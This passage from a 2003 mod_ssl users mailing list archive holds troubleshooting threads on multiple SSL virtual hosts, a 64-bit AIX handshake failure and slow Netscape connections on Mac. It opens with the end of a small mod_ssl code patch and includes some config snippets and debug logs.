+    if (*var == '_') var++;
     if (strspn(var, "0123456789") == strlen(var)) {
         n = atoi(var);
         if (n < sk_X509_num(sk)) {

Regards,
	Maik
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 18:20:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 336052AA014; Wed, 19 Feb 2003 18:20:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from celery.onware.ca (celery.onware.ca [142.179.205.152])
	by master.modssl.org (Postfix) with ESMTP id 9F81F2AA000
	for ; Wed, 19 Feb 2003 18:20:03 +0100 (CET)
Received: by celery.onware.ca (Postfix, from userid 1001)
	id A2BDC3FA79; Wed, 19 Feb 2003 10:02:01 -0700 (MST)
Received: from localhost (localhost [127.0.0.1])
	by celery.onware.ca (Postfix) with ESMTP id 997533FA69
	for ; Wed, 19 Feb 2003 10:02:01 -0700 (MST)
Date: Wed, 19 Feb 2003 10:02:01 -0700 (MST)
From: Ian Moon 
To: modssl-users@modssl.org
Subject: RE: Multiple SSL VirtualHosts in apache
In-Reply-To: 
Message-ID: <20030219100035.O14258-100000@celery.onware.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Moon 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I believe that I read somewhere that you must have a different
ip address for each ssl virtualhost.

Ian Moon

On Wed, 19 Feb 2003, Boyle Owen wrote:

> >-----Original Message-----
> >From: Steve Pirk [mailto:orion@deathcon.com]
> >Sent: Donnerstag, 6. Februar 2003 02:02
> >To: modssl-users@modssl.org
> >Subject: Multiple SSL VirtualHosts in apache
> >
> >
> >I check the mail archives, but could not find a good
> >answer for this "problem" I am having.
> >
> >I am building out a dev environment using apache
> >on Solaris. The dev environment needs to run under
> >SSL (to simulate the production environment). I am
> >starting with 4 virtual servers. They all use the
> >same cert file, but are on different ports.
> >
> >The problem I am running into is that only the "first"
> >VirtualHost works. Requests to subsequent ports result
> >in a mod_ssl:error:HTTP-request error. Here is the error_log
> >entry:
> >
> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
> >spoken on HTTPS port; trying to send HTML error page (OpenSSL library
> >error follows)
>
> This looks like you typed http://server:7001/ into the browser. You
> still need to define https even if you have the port number, i.e.
> https://server:7001/.
>
> Can you confirm that if you do this, you still get an error?
>
> Rgds,
> Owen Boyle
>
>
> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
> >HTTP to HTTPS
> >port!?]
> >
> >This is being used in conjunction with an auth package,
> >but the redirect after logging in is https://
> >
> >Does anyone knnow of a good way to have multiple
> >SSL virtual servers on one apache instance?
>
> The way you are doing it is fine. You just have a probelm...
>
> >
> >Here is a sample of httpd.conf. In this case, port 7000
> >works, but 7001 and 7002 get the mod_ssl error.
> >
> >  
> >    DocumentRoot        /some/doc/root
> >    SSLEngine on
> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >  
> >
> >  
> >    DocumentRoot        /some/doc/root
> >    SSLEngine on
> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >  
> >
> >  
> >    DocumentRoot        /some/doc/root
> >    SSLEngine on
> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >  
> >
> >--
> >Steve (egrep)
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 18:38:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88E402AA014; Wed, 19 Feb 2003 18:38:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from phil1.credit-agricole.fr (phil1.credit-agricole.fr [192.44.63.129])
	by master.modssl.org (Postfix) with ESMTP id 29F0C2AA000
	for ; Wed, 19 Feb 2003 18:38:48 +0100 (CET)
Received: from srvrm.ca-sctbrunoy.fr (smtp.ca-sctbrunoy.fr [158.191.105.6])
	by phil1.credit-agricole.fr (Mirapoint Messaging Server MOS 3.2.1-GA)
	with ESMTP id AEY17064;
	Wed, 19 Feb 2003 20:11:17 +0100 (CET)
From: 
Received: from srvrm.ca-sctbrunoy.fr (unverified) by srvrm.ca-sctbrunoy.fr 
    (Content Technologies SMTPRS 4.3.1) with SMTP id 
     for 
    ; Wed, 19 Feb 2003 18:37:42 +0100
Received: from 10.105.32.23 by srvrm.ca-sctbrunoy.fr 
    (InterScan E-Mail VirusWall NT); Wed, 19 Feb 2003 18:37:42 +0100
Received: from srvsg1.esp.intra (unverified) by srvsg1.esp.intra 
    (Content Technologies SMTPRS 4.3.6) with SMTP id 
     for ; 
    Wed, 19 Feb 2003 18:39:39 +0100
Received: from 10.105.32.19 by srvsg1.esp.intra 
    (InterScan E-Mail VirusWall NT); Wed, 19 Feb 2003 18:39:39 +0100
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed; 
    boundary="----=_NextPartTM-000-5026d4e3-f26c-41c3-bc69-b3f618c0a694"
Subject: apache is not able to server an SSL html page
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Wed, 19 Feb 2003 18:39:58 +0100
Message-ID: <2DF7FDEFFF4D2746B645F7728881B46A051A58@mercure.ESP.INTRA>
Thread-Topic: apache is not able to server an SSL html page
Thread-Index: AcLYPew7nk2KfpW1QOCvWCtzf4ehSg==
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPartTM-000-5026d4e3-f26c-41c3-bc69-b3f618c0a694
Content-Type: multipart/alternative; 
    boundary="----_=_NextPart_001_01C2D83D.EC1453B8"


------_=_NextPart_001_01C2D83D.EC1453B8
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I need some help, or just a new way of investigation for a msg in
error_log, when handshake SSL occurs..

Config :
APACHE 2.0.44
OpenSSL 0.9.7
OS =3D AIX 5.2 kernel 64 bits=20
Compiler =3D cc_r ( IBM compiler )
No DSO
MPM-WORKER

When compile in 32 bit mode, all work fine and I 've got this msg when
handshake SSL is starting:
[Tue Feb 18 17:52:46 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Feb 18 17:52:46 2003] [debug] ssl_engine_kernel.c(1758): OpenSSL:
Handshake: start
[Tue Feb 18 17:52:46 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL:
Loop: before/accept initialization
[Tue Feb 18 17:52:46 2003] [debug] ssl_engine_io.c(1477): OpenSSL: read
11/11 bytes from BIO#30a21348 [mem: 36fca158] (BIO dump follows)
[Tue Feb 18 17:52:46 2003] [debug] ssl_engine_io.c(1424):
+-----------------------------------------------------------------------
--+
[Tue Feb 18 17:52:46 2003] [debug] ssl_engine_io.c(1449): | 0000: 80 43
01 03 00 00 2a 00-00 00 10                 .C....*....      |
[Tue Feb 18 17:52:46 2003] [debug] ssl_engine_io.c(1455):
+-----------------------------------------------------------------------
--+...
...

As soon as I compile in 64 bit mode, apache is not able to server an SSL
html page, and I found this error when handshake SSL is starting:
[Mon Feb 10 14:27:47 2003] [info] Seeding PRNG with 144 bytes of entropy
[Mon Feb 10 14:27:47 2003] [debug] ssl_engine_kernel.c(1758): OpenSSL:
Handshake: start
[Mon Feb 10 14:27:47 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL:
Loop: before/accept initialization
[Mon Feb 10 14:27:47 2003] [debug] ssl_engine_io.c(1477): OpenSSL: read
0/11 bytes from BIO#1103b10d0 [mem: 1105ba110] (BIO dump follows)
[Mon Feb 10 14:27:47 2003] [debug] ssl_engine_io.c(1424):
+-----------------------------------------------------------------------
--+
[Mon Feb 10 14:27:47 2003] [debug] ssl_engine_io.c(1455):
+-----------------------------------------------------------------------
--+
[Mon Feb 10 14:27:47 2003] [info] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!]
[Mon Feb 10 14:27:47 2003] [info] Connection to child 64 closed with
abortive shutdown

Any help should be appreciate.
Thanks in advance.

Pierre.



---------------------------------------------------------------------
Ce message et toutes les pieces jointes sont a l'intention exclusive de ses=
 destinataires et sont confidentiels. Si vous recevez ce message par erreur=
, merci de le detruire et d'en avertir immediatement l'expediteur.
Toute utilisation de ce message non conforme a sa destination, toute diffus=
ion ou toute duplication, totale ou partielle, est interdite, sauf autorisa=
tion prealable.
L'internet ne permettant pas d'assurer l'integrite de ce message, nous decl=
inons toute responsabilite au titre de ce message, dans l'hypothese ou il a=
urait ete modifie.
               -------------------
This message and any attachements are intended solely for the addressees an=
d are confidential. If you receive this message by error, please delete it =
and immediately notify the sender.
Any use not in accord with its purpose, any dissemination or disclosure, ei=
ther whole or partial, is prohibited except previous approval.
The internet can not guarantee the integrity of this message. We will  not =
therefore be liable for the message if modified.
---------------------------------------------------------------------


------_=_NextPart_001_01C2D83D.EC1453B8
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






apache is not able to server an SSL html page





I need some help, or just a new way of investigation for a msg in erro=
r_log, when handshake SSL occurs..






Config :



APACHE 2.0.44=




OpenSSL 0.9.7<=
/FONT>



OS =3D AIX 5.2 kernel 64 bits 



Compiler =3D cc_r ( IBM compiler )



No DSO=




MPM-WORKER






When compile in 32 b=
it mode, all work fine and I <=
/SPAN>ve got this msg when<=
/FONT> handshake SSL is starting:



[Tue Feb 18 17:52:46 2003] [info] Seeding PRNG with 136 bytes of entro=
py



[Tue Feb 18 17:52:46=
 2003] [debug] ssl_engine_kernel.c(1758): OpenSSL: Handshake: start<=
/SPAN>



[Tue Feb 18 17:52:46=
 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL: Loop: before/accept init=
ialization



[Tue Feb 18 17:52:46=
 2003] [debug] ssl_engine_io.c(1477): OpenSSL: read 11/11 bytes from BIO#30=
a21348 [mem: 36fca158] (BIO dump follows)



[Tue Feb 18 17:52:46=
 2003] [debug] ssl_engine_io.c(1424): +------------------------------------=
-------------------------------------+



[Tue Feb 18 17:52:46=
 2003] [debug] ssl_engine_io.c(1449): | 0000: 80 43 01 03 00 00 2a 00-00 00=
 10            =
     .C....*....      |=




[Tue Feb 18 17:52:46=
 2003] [debug] ssl_engine_io.c(1455): +------------------------------------=
-------------------------------------+









As soon as I compile in 64 bit mode, apache is not able t=
o server an SSL=
 html page, and I found this error when ha=
ndshake SSL is starting:



[Mon Feb 10 14:27:47 2003] [info] Seeding PRNG with 144 bytes of entro=
py



[Mon Feb 10 14:27:47=
 2003] [debug] ssl_engine_kernel.c(1758): OpenSSL: Handshake: start<=
/SPAN>



[Mon Feb 10 14:27:47=
 2003] [debug] ssl_engine_kernel.c(1766): OpenSSL: Loop: before/accept init=
ialization



[Mon Feb 10 14:27:47=
 2003] [debug] ssl_engine_io.c(1477): OpenSSL: read 0/11 bytes from BIO#110=
3b10d0 [mem: 1105ba110] (BIO dump follows)



[Mon Feb 10 14:27:47=
 2003] [debug] ssl_engine_io.c(1424): +------------------------------------=
-------------------------------------+



[Mon Feb 10 14:27:47=
 2003] [debug] ssl_engine_io.c(1455): +------------------------------------=
-------------------------------------+



[Mon Feb 10 14:27:47=
 2003] [info] SSL handshake interrupted by system [Hint: Stop button presse=
d in browser?!]



[Mon Feb=
 10 14:27:47 2003] [info] Connection to child 64 closed with abortive shutd=
own






Any help should be appreciate.



Thanks in advance.



Pierre.









---------------------------------------------------------------------

Ce message et toutes les pieces jointes sont a l'intention exclusive de ses=
 destinataires et sont confidentiels. Si vous recevez ce message par erreur=
, merci de le detruire et d'en avertir immediatement l'expediteur.

Toute utilisation de ce message non conforme a sa destination, toute diffus=
ion ou toute duplication, totale ou partielle, est interdite, sauf autorisa=
tion prealable.

L'internet ne permettant pas d'assurer l'integrite de ce message, nous decl=
inons toute responsabilite au titre de ce message, dans l'hypothese ou il a=
urait ete modifie.

               -------------------

This message and any attachements are intended solely for the addressees an=
d are confidential. If you receive this message by error, please delete it =
and immediately notify the sender.

Any use not in accord with its purpose, any dissemination or disclosure, ei=
ther whole or partial, is prohibited except previous approval.

The internet can not guarantee the integrity of this message. We will  not =
therefore be liable for the message if modified.

---------------------------------------------------------------------




------_=_NextPart_001_01C2D83D.EC1453B8--

------=_NextPartTM-000-5026d4e3-f26c-41c3-bc69-b3f618c0a694--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 19:30:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B41B2AA014; Wed, 19 Feb 2003 19:30:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sage-american.com (adsl-65-71-135-139.dsl.crchtx.swbell.net [65.71.135.139])
	by master.modssl.org (Postfix) with ESMTP id 867432AA000
	for ; Wed, 19 Feb 2003 19:30:04 +0100 (CET)
Received: from sagea (sagea.sage-american [192.168.0.3])
	by sage-american.com (8.12.6/8.12.6) with SMTP id h1JITuFU094947;
	Wed, 19 Feb 2003 12:29:57 -0600 (CST)
	(envelope-from jacks@sage-american.com)
Message-Id: <3.0.5.32.20030219122954.01205458@192.168.0.5>
X-Sender: jacks@192.168.0.5
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Wed, 19 Feb 2003 12:29:54 -0600
To: modssl-users@modssl.org, modssl-users@modssl.org
From: "Jack L. Stone" 
Subject: RE: Multiple SSL VirtualHosts in apache
In-Reply-To: <20030219100035.O14258-100000@celery.onware.ca>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Spam-Status: No, hits=0.7 required=4.5
	tests=IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,RESERVES_RIGHT,
	      SPAM_PHRASE_05_08,WEIRD_PORT
	version=2.44-sageamerules_v1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jack L. Stone" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Please excuse the top post:

Ian or anyone, are you sure that a wildcard setup won't work....??? Just
getting ready to do a fresh install involvoing vhosts and this will become
an important issue.

Thanks!

At 10:02 AM 2.19.2003 -0700, Ian Moon wrote:
>I believe that I read somewhere that you must have a different
>ip address for each ssl virtualhost.
>
>Ian Moon
>
>On Wed, 19 Feb 2003, Boyle Owen wrote:
>
>> >-----Original Message-----
>> >From: Steve Pirk [mailto:orion@deathcon.com]
>> >Sent: Donnerstag, 6. Februar 2003 02:02
>> >To: modssl-users@modssl.org
>> >Subject: Multiple SSL VirtualHosts in apache
>> >
>> >
>> >I check the mail archives, but could not find a good
>> >answer for this "problem" I am having.
>> >
>> >I am building out a dev environment using apache
>> >on Solaris. The dev environment needs to run under
>> >SSL (to simulate the production environment). I am
>> >starting with 4 virtual servers. They all use the
>> >same cert file, but are on different ports.
>> >
>> >The problem I am running into is that only the "first"
>> >VirtualHost works. Requests to subsequent ports result
>> >in a mod_ssl:error:HTTP-request error. Here is the error_log
>> >entry:
>> >
>> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
>> >spoken on HTTPS port; trying to send HTML error page (OpenSSL library
>> >error follows)
>>
>> This looks like you typed http://server:7001/ into the browser. You
>> still need to define https even if you have the port number, i.e.
>> https://server:7001/.
>>
>> Can you confirm that if you do this, you still get an error?
>>
>> Rgds,
>> Owen Boyle
>>
>>
>> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
>> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
>> >HTTP to HTTPS
>> >port!?]
>> >
>> >This is being used in conjunction with an auth package,
>> >but the redirect after logging in is https://
>> >
>> >Does anyone knnow of a good way to have multiple
>> >SSL virtual servers on one apache instance?
>>
>> The way you are doing it is fine. You just have a probelm...
>>
>> >
>> >Here is a sample of httpd.conf. In this case, port 7000
>> >works, but 7001 and 7002 get the mod_ssl error.
>> >
>> >  
>> >    DocumentRoot        /some/doc/root
>> >    SSLEngine on
>> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>> >  
>> >
>> >  
>> >    DocumentRoot        /some/doc/root
>> >    SSLEngine on
>> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>> >  
>> >
>> >  
>> >    DocumentRoot        /some/doc/root
>> >    SSLEngine on
>> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>> >  
>> >
>> >--
>> >Steve (egrep)
>> >______________________________________________________________________
>> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> >User Support Mailing List                      modssl-users@modssl.org
>> >Automated List Manager                            majordomo@modssl.org
>> >
>>
>> This message is for the named person's use only. It may contain
>> confidential, proprietary or legally privileged information. No
>> confidentiality or privilege is waived or lost by any mistransmission.
>> If you receive this message in error, please notify the sender urgently
>> and then immediately delete the message and any copies of it from your
>> system. Please also immediately destroy any hardcopies of the message.
>> You must not, directly or indirectly, use, disclose, distribute, print,
>> or copy any part of this message if you are not the intended recipient.
>> The sender's company reserves the right to monitor all e-mail
>> communications through their networks. Any views expressed in this
>> message are those of the individual sender, except where the message
>> states otherwise and the sender is authorised to state them to be the
>> views of the sender's company.
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>

Best regards,
Jack L. Stone,
Administrator

Sage American
http://www.sage-american.com
jacks@sage-american.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 20:17:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CFAD72AA014; Wed, 19 Feb 2003 20:17:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 3132B2AA000
	for ; Wed, 19 Feb 2003 20:17:29 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA08971;
	Wed, 19 Feb 2003 14:15:04 -0500
Date: Wed, 19 Feb 2003 14:15:03 -0500 (EST)
From: "R. DuFresne" 
To: "Jack L. Stone" 
Cc: modssl-users@modssl.org, modssl-users@modssl.org
Subject: RE: Multiple SSL VirtualHosts in apache
In-Reply-To: <3.0.5.32.20030219122954.01205458@192.168.0.5>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


It's IP and/or port based.  But, do remember, if port based then one is
server only one cert, and the trouble is making sure the cert is
constructed in a fashoin such that hostnames are not contained within the
CN and such.  In this case, and others can correct me if I'm wrong here,
you would need to generate the cert on the IP rather then FDQN.  And I'm
not sure openssl allows such a cert, but others might well be better clued
then I on this .

Thanks,

Ron DuFresne

On Wed, 19 Feb 2003, Jack L. Stone wrote:

> Please excuse the top post:
> 
> Ian or anyone, are you sure that a wildcard setup won't work....??? Just
> getting ready to do a fresh install involvoing vhosts and this will become
> an important issue.
> 
> Thanks!
> 
> At 10:02 AM 2.19.2003 -0700, Ian Moon wrote:
> >I believe that I read somewhere that you must have a different
> >ip address for each ssl virtualhost.
> >
> >Ian Moon
> >
> >On Wed, 19 Feb 2003, Boyle Owen wrote:
> >
> >> >-----Original Message-----
> >> >From: Steve Pirk [mailto:orion@deathcon.com]
> >> >Sent: Donnerstag, 6. Februar 2003 02:02
> >> >To: modssl-users@modssl.org
> >> >Subject: Multiple SSL VirtualHosts in apache
> >> >
> >> >
> >> >I check the mail archives, but could not find a good
> >> >answer for this "problem" I am having.
> >> >
> >> >I am building out a dev environment using apache
> >> >on Solaris. The dev environment needs to run under
> >> >SSL (to simulate the production environment). I am
> >> >starting with 4 virtual servers. They all use the
> >> >same cert file, but are on different ports.
> >> >
> >> >The problem I am running into is that only the "first"
> >> >VirtualHost works. Requests to subsequent ports result
> >> >in a mod_ssl:error:HTTP-request error. Here is the error_log
> >> >entry:
> >> >
> >> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
> >> >spoken on HTTPS port; trying to send HTML error page (OpenSSL library
> >> >error follows)
> >>
> >> This looks like you typed http://server:7001/ into the browser. You
> >> still need to define https even if you have the port number, i.e.
> >> https://server:7001/.
> >>
> >> Can you confirm that if you do this, you still get an error?
> >>
> >> Rgds,
> >> Owen Boyle
> >>
> >>
> >> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
> >> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
> >> >HTTP to HTTPS
> >> >port!?]
> >> >
> >> >This is being used in conjunction with an auth package,
> >> >but the redirect after logging in is https://
> >> >
> >> >Does anyone knnow of a good way to have multiple
> >> >SSL virtual servers on one apache instance?
> >>
> >> The way you are doing it is fine. You just have a probelm...
> >>
> >> >
> >> >Here is a sample of httpd.conf. In this case, port 7000
> >> >works, but 7001 and 7002 get the mod_ssl error.
> >> >
> >> >  
> >> >    DocumentRoot        /some/doc/root
> >> >    SSLEngine on
> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >> >  
> >> >
> >> >  
> >> >    DocumentRoot        /some/doc/root
> >> >    SSLEngine on
> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >> >  
> >> >
> >> >  
> >> >    DocumentRoot        /some/doc/root
> >> >    SSLEngine on
> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >> >  
> >> >
> >> >--
> >> >Steve (egrep)
> >> >______________________________________________________________________
> >> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >> >User Support Mailing List                      modssl-users@modssl.org
> >> >Automated List Manager                            majordomo@modssl.org
> >> >
> >>
> >> This message is for the named person's use only. It may contain
> >> confidential, proprietary or legally privileged information. No
> >> confidentiality or privilege is waived or lost by any mistransmission.
> >> If you receive this message in error, please notify the sender urgently
> >> and then immediately delete the message and any copies of it from your
> >> system. Please also immediately destroy any hardcopies of the message.
> >> You must not, directly or indirectly, use, disclose, distribute, print,
> >> or copy any part of this message if you are not the intended recipient.
> >> The sender's company reserves the right to monitor all e-mail
> >> communications through their networks. Any views expressed in this
> >> message are those of the individual sender, except where the message
> >> states otherwise and the sender is authorised to state them to be the
> >> views of the sender's company.
> >>
> >>
> >> ______________________________________________________________________
> >> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >> User Support Mailing List                      modssl-users@modssl.org
> >> Automated List Manager                            majordomo@modssl.org
> >>
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
> 
> Best regards,
> Jack L. Stone,
> Administrator
> 
> Sage American
> http://www.sage-american.com
> jacks@sage-american.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 23:54:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2B582AA01A; Wed, 19 Feb 2003 23:54:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bart.syscom.com (mail.syscom.com [65.213.3.71])
	by master.modssl.org (Postfix) with ESMTP id 7901F2AA002
	for ; Wed, 19 Feb 2003 23:54:02 +0100 (CET)
Received: from syscomex.syscom.com ([10.1.0.6])
          by bart.syscom.com (Lotus Domino Release 6.0)
          with ESMTP id 2003021917525696-12880 ;
          Wed, 19 Feb 2003 17:52:56 -0500 
Received: by SYSCOMEX with Internet Mail Service (5.5.2653.19)
	id ; Wed, 19 Feb 2003 17:51:19 -0500
Message-ID: <78F894212370D511BFB500508B78799F92B2AF@SYSCOMEX>
From: "Takaoglu, Uzay" 
To: "'modssl-users@modssl.org'" 
Subject: SSL config for Netscape 4.5 , 4.6, 4.7 on Mac
Date: Wed, 19 Feb 2003 17:51:15 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-MIMETrack: Itemize by SMTP Server on Bart/SRVR/syscom(Release 6.0|September 26, 2002) at
 02/19/2003 05:52:56 PM,
	Serialize by Router on Bart/SRVR/syscom(Release 6.0|September 26, 2002) at
 02/19/2003 05:53:02 PM,
	Serialize complete at 02/19/2003 05:53:02 PM
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2D869.685D35E0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Takaoglu, Uzay" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2D869.685D35E0
Content-Type: text/plain;
	charset="iso-8859-1"

Hi All,
 
My system is running on 1.3.27 / 2.8.12 / 0.9.6g.  The SSL connection from
Netscape 4.5, 4.6 and 4.7  browsers running only on "Mac" seems like taking
very long time to load a page with or without the images (50-60K pages about
2-3 mins with a T1 connection). I'm not really sure if the problem is caused
by the server (e.g. TLS intolerant) or by the Netscape client (e.g. random
num generation ). My attemps to solve the problem have been unsuccessfull so
far.
 
Any help is much appreaciated.
 
Kind Regards,
 
 

------_=_NextPart_001_01C2D869.685D35E0
Content-Type: text/html;
	charset="iso-8859-1"









Hi 
All,


 


My system is running 
on 1.3.27 / 2.8.12 / 0.9.6g.  The SSL connection from Netscape 4.5, 
4.6 and 4.7  browsers running only on "Mac" seems like 
taking very long time to load a page with or without the images 
(50-60K pages about 2-3 mins with a T1 connection). I'm not really sure if 
the problem is caused by the server (e.g. TLS intolerant) or by the Netscape 
client (e.g. random num generation ). My attemps to solve the problem have been 
unsuccessfull so far.


 


Any help is much 
appreaciated.


 


Kind 
Regards,


 


 


